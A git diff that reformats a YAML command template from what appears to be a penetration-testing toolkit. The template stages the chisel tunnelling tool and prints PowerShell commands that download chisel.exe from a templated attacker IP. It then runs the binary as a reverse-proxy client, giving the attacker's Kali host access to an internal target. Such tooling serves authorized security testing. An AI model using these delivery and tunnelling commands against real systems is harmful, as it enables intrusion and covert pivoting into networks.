--- a/src/profi/templates/scripts/deliver-windows-chisel-reverse-proxy-including-setup.yaml
+++ b/src/profi/templates/scripts/deliver-windows-chisel-reverse-proxy-including-setup.yaml
@@ -1,24 +1,25 @@
+---
 metadata:
-  filename: deliver-windows-chisel-reverse-proxy-including-setup.yaml
-  tags:
-  - windows
-  - proxy
-  created: '2025-03-29'
-  author: Unknown
-content: "mkdir -p packstation/outbound; gunzip -c {{ tools_dir }}/chisel/chisel_windows_amd64.gz\
-  \ > packstation/outbound/chisel.exe; gunzip -c {{ tools_dir }}/chisel/chisel_linux_amd64.gz\
-  \ > chisel; chmod +x chisel; \\\n\necho \"Answer the following with a target ip\
-  \ and port. Appropriate commands will be printed.\"; \\\nread --prompt-str \"Target\
-  \ IP:\" target; \\\nread --prompt-str \"Target port:\" target_port; \\\nread --prompt-str\
-  \ \"Kali port:\" kali_port; \\\n\necho '================================================================';\
-  \ \\\necho '                      -----Kali-----                      '; \\\necho\
-  \ 'Start reverse proxy: ./chisel server -p {{ proxy_port }} --reverse'; \\\necho\
-  \ '================================================================'; \\\necho '\
-  \                      -----PowerShell-----                      '; \\\necho 'Deliver\
-  \ only: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/chisel.exe\
-  \ -Outfile {{ delivery_path_windows }}\\chisel.exe'; \\\necho \"To run: {{ delivery_path_windows\
-  \ }}\\chisel.exe client {{ attacker_ip }}:{{ proxy_port }} R:$kali_port:$target:$target_port\"\
-  ; \\\necho \"Expected Result: You should be able to reach $target:$target_$port\
-  \ on 127.0.0.1:$kali_port\"; \\\necho '================================================================';\
-  \ \\\n python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{\
-  \ delivery_outbound_port }} -d packstation/outbound\n"
+  filename: "deliver-windows-chisel-reverse-proxy-including-setup.yaml"
+  tags: ["windows", "proxy"]
+  created: "2025-03-29"
+  author: "Unknown"
+
+content: |
+  mkdir -p packstation/outbound; gunzip -c {{ tools_dir }}/chisel/chisel_windows_amd64.gz > packstation/outbound/chisel.exe; gunzip -c {{ tools_dir }}/chisel/chisel_linux_amd64.gz > chisel; chmod +x chisel; \
+
+  echo "Answer the following with a target ip and port. Appropriate commands will be printed."; \
+  read --prompt-str "Target IP:" target; \
+  read --prompt-str "Target port:" target_port; \
+  read --prompt-str "Kali port:" kali_port; \
+
+  echo '================================================================'; \
+  echo '                      -----Kali-----                      '; \
+  echo 'Start reverse proxy: ./chisel server -p {{ proxy_port }} --reverse'; \
+  echo '================================================================'; \
+  echo '                      -----PowerShell-----                      '; \
+  echo 'Deliver only: iwr -uri http://{{ attacker_ip }}:{{ delivery_outbound_port }}/chisel.exe -Outfile {{ delivery_path_windows }}\chisel.exe'; \
+  echo "To run: {{ delivery_path_windows }}\chisel.exe client {{ attacker_ip }}:{{ proxy_port }} R:$kali_port:$target:$target_port"; \
+  echo "Expected Result: You should be able to reach $target:$target_$port on 127.0.0.1:$kali_port"; \
+  echo '================================================================'; \
+  python {{ templates_dir }}/helper_scripts/startEnhancedHttpServer.py -p {{ delivery_outbound_port }} -d packstation/outbound
